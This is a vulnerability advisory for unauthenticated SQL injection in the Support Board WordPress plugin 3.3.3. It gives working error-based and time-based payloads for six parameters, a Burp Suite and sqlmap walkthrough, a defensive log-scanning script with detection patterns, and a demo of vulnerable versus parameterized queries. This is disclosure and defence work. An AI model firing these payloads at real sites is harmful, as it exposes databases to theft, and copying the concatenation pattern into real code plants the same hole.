CVE-2021-24741
Multiple SQL Injection (Unauthenticated) in Support Board v3.3.3
Summary:
Support Board is a WordPress plugin that helps you automate your customers' communication with AI-driven bots and a chat system integrated with the most used messaging platforms.
While doing penetration testing on Support Board, I found multiple SQL injection points in Support Board version 3.3.3 that allow remote unauthenticated attackers to execute arbitrary SQL commands via the status_code, department, user_id, conversation_id, conversation_status_code and recipient_id parameters.
SQL Injection:
SQL injection is a web security vulnerability that allows an attacker to alter the SQL queries an application sends to its database. It can be used to retrieve sensitive information such as the database structure, tables, columns and the data they hold.
Here are the vulnerable parameters that I found in Support Board version 3.3.3.
PoC for every parameter
We need to send a message through the chat system and intercept the request with Burp Suite.
After intercepting, keep forwarding requests until we reach the one calling the function named "new-conversation", then send that request to Repeater.
Now go back to the Proxy tab and intercept the next request; keep forwarding again until we find the request calling the function named "send-message".
Send that one to Repeater as well, so we end up with two Repeater tabs: one for the "new-conversation" function and one for the "send-message" function.
New Conversation Function
PoC for status code parameter
payload
"+AND+EXTRACTVALUE(4597,CONCAT("","""+DB:+",(SELECT+(ELT(4597=4597,""))),database()))+AND+"fKoo"="fKoo
Adding the payload to the status_code parameter and sending the request returns the database name in the response.
PoC for department parameter
payload
(UPDATEXML(5632,CONCAT(0x2e,"Database+Name:+",(SELECT+(ELT(5632=5632,""))),database()),3004))
Adding the payload to the department parameter and sending the request returns the database name in the response.
Now we move to the send-message function to exploit the user_id and conversation_id parameters.
Send Message Function
PoC for user_id parameter
payload
"+AND+GTID_SUBSET(CONCAT("Database+Name:+",(SELECT+(ELT(3919=3919,""))),database()),3919)+AND+"wrOJ"="wrOJ
Adding the payload to the user_id parameter and sending the request returns the database name in the response.
PoC for conversation_id parameter
payload
"+AND+(SELECT 1479+FROM+(SELECT(SLEEP(5)))xttx)--+BOXv
We use sqlmap to exploit the time-based injection: save the request from Repeater to a file named req, then run sqlmap against that request to confirm that the conversation_id parameter is vulnerable to time-based injection.
sqlmap -r req
As you can see, conversation_id is vulnerable.
PoC for conversation_status_code parameter
payload
WHERE+9793=9793+AND+(SELECT+4500+FROM+(SELECT(SLEEP(5)))oJCl)--+uAGp
Again we use sqlmap to exploit the time-based injection: save the request from Repeater to a file named req, then run sqlmap against it to confirm that the conversation_status_code parameter is vulnerable to time-based injection.
sqlmap -r req
As you can see, conversation_status_code is vulnerable.
PoC for recipient_id parameter
payload
AND+(SELECT+7416+FROM+(SELECT(SLEEP(5)))eBhm)
Again we use sqlmap to exploit the time-based injection: save the request from Repeater to a file named req, then run sqlmap against it to confirm that the recipient_id parameter is vulnerable to time-based injection.
sqlmap -r req
As you can see, recipient_id is vulnerable.
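From a defender's side, the two payload families used above (error-based via EXTRACTVALUE/UPDATEXML/GTID_SUBSET, and time-based via SLEEP) are easy to spot in request logs once the parameter values are URL-decoded. The following Python script is an added example, not part of this advisory or of the Support Board plugin: it parses a few constructed access-log lines, decodes the query string, and flags the advisory's six parameter names when a value carries one of those signatures. The endpoint path /chat-endpoint, the log format and all IP addresses are made up; the parameter and function names (new-conversation, send-message) are the ones named above. Real Support Board requests are POSTs, so in practice the query-string scanner would be fed from a WAF or application log that records the request body.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory names as injectable in Support Board 3.3.3.
WATCHED_PARAMS = {
    "status_code", "department", "user_id",
    "conversation_id", "conversation_status_code", "recipient_id",
}

# Payload families seen in the advisory, matched case-insensitively on the
# decoded parameter value.
SIGNATURES = {
    "error-based": re.compile(r"\b(EXTRACTVALUE|UPDATEXML|GTID_SUBSET)\s*\(", re.I),
    "time-based": re.compile(r"\bSLEEP\s*\(\s*\d+(\.\d+)?\s*\)", re.I),
}

# Combined-log-style request line: ip ident user [time] "METHOD target HTTP/x" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample log; /chat-endpoint and the addresses are placeholders.
SAMPLE_LOG = """\
198.51.100.2 - - [20/Sep/2021:10:00:01 +0000] "GET /chat-endpoint?function=new-conversation&status_code=2&department=1 HTTP/1.1" 200 311
203.0.113.7 - - [20/Sep/2021:10:00:05 +0000] "GET /chat-endpoint?function=new-conversation&status_code=%22+AND+EXTRACTVALUE%284597%2CCONCAT%280x2e%2Cdatabase%28%29%29%29+AND+%22fKoo%22%3D%22fKoo HTTP/1.1" 500 188
203.0.113.7 - - [20/Sep/2021:10:00:09 +0000] "GET /chat-endpoint?function=send-message&user_id=1&conversation_id=5+AND+%28SELECT+1479+FROM+%28SELECT%28SLEEP%285%29%29%29xttx%29--+BOXv HTTP/1.1" 200 64
203.0.113.7 - - [20/Sep/2021:10:00:14 +0000] "GET /chat-endpoint?function=new-conversation&department=%28UPDATEXML%285632%2CCONCAT%280x2e%2Cdatabase%28%29%29%2C3004%29%29 HTTP/1.1" 500 188
198.51.100.2 - - [20/Sep/2021:10:00:20 +0000] "GET /chat-endpoint?function=send-message&user_id=1&message=see+you+after+SLEEP%285%29 HTTP/1.1" 200 64
this line is not a request record and is skipped
"""


def scan_query_string(query):
    """Return (function, param, technique) hits found in one decoded query string."""
    qs = parse_qs(query, keep_blank_values=True)
    function = qs.get("function", ["?"])[0]
    hits = []
    for param, values in qs.items():
        if param not in WATCHED_PARAMS:
            continue  # only the advisory's parameters; widen this set as needed
        for value in values:
            for technique, rx in SIGNATURES.items():
                if rx.search(value):
                    hits.append((function, param, technique))
    return hits


def scan_log(text):
    """Parse access-log text and return one finding dict per flagged parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for function, param, technique in scan_query_string(query):
            findings.append({"ip": m["ip"], "function": function,
                             "param": param, "technique": technique})
    return findings


def summarize_by_ip(findings):
    """Count flagged requests per source address, for alert thresholds."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['ip']} -> {f['function']}.{f['param']} ({f['technique']})")
    print(summarize_by_ip(found))
```

Time-based payloads leave a second trace that the regex cannot see: the response time. Correlating these hits with request latency (a 5-second delay on an otherwise fast endpoint) gives a much lower false-positive rate than the signature alone.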
Timeline:
Remediation
Update to the latest version, which is version 3.3.4.
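The underlying defect behind every parameter above is the same: an attacker-controlled value is spliced into the SQL text, so a quote character ends the intended literal and the rest of the input becomes SQL. The following Python/SQLite snippet is an added example, not code from this advisory or from the Support Board plugin: it shows the flawed concatenation pattern next to the parameterized form, using a constructed conversations table. The table layout, the query and the hypothetical status_code value are assumptions made for illustration; the WordPress-native equivalent of the safe version is passing values through $wpdb->prepare() instead of building the string by hand.

```python
import sqlite3


def build_demo_db():
    """In-memory table standing in for a chat plugin's conversations (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE conversations (id INTEGER PRIMARY KEY, user_id INTEGER, "
        "status_code INTEGER, title TEXT)"
    )
    conn.executemany(
        "INSERT INTO conversations (user_id, status_code, title) VALUES (?, ?, ?)",
        [
            (1, 0, "billing question"),
            (1, 2, "closed ticket"),
            (2, 0, "other user's private chat"),
        ],
    )
    return conn


def conversations_by_status_vulnerable(conn, user_id, status_code):
    """Flawed pattern: untrusted status_code is concatenated into the query text,
    so a quote in the value changes the query's structure."""
    sql = (
        f"SELECT title FROM conversations "
        f"WHERE user_id = {int(user_id)} AND status_code = '{status_code}'"
    )
    return [row[0] for row in conn.execute(sql)]


def conversations_by_status_safe(conn, user_id, status_code):
    """Hardened form: the value travels as a bound parameter and is never
    interpreted as SQL, whatever characters it contains."""
    sql = "SELECT title FROM conversations WHERE user_id = ? AND status_code = ?"
    return [row[0] for row in conn.execute(sql, (int(user_id), status_code))]


if __name__ == "__main__":
    db = build_demo_db()
    # Hypothetical tautology payload of the same shape as the advisory's
    # ("..." AND "fKoo"="fKoo), written with single quotes for SQLite.
    payload = "0' OR 'a'='a"
    print(conversations_by_status_vulnerable(db, 1, payload))  # leaks every row
    print(conversations_by_status_safe(db, 1, payload))        # no rows
    print(conversations_by_status_safe(db, 1, "0"))            # the one intended row
```

The safe version also makes the integer parameter explicit with int(), which is the second half of the fix for fields like user_id and conversation_id: validate the expected type first, then bind the value.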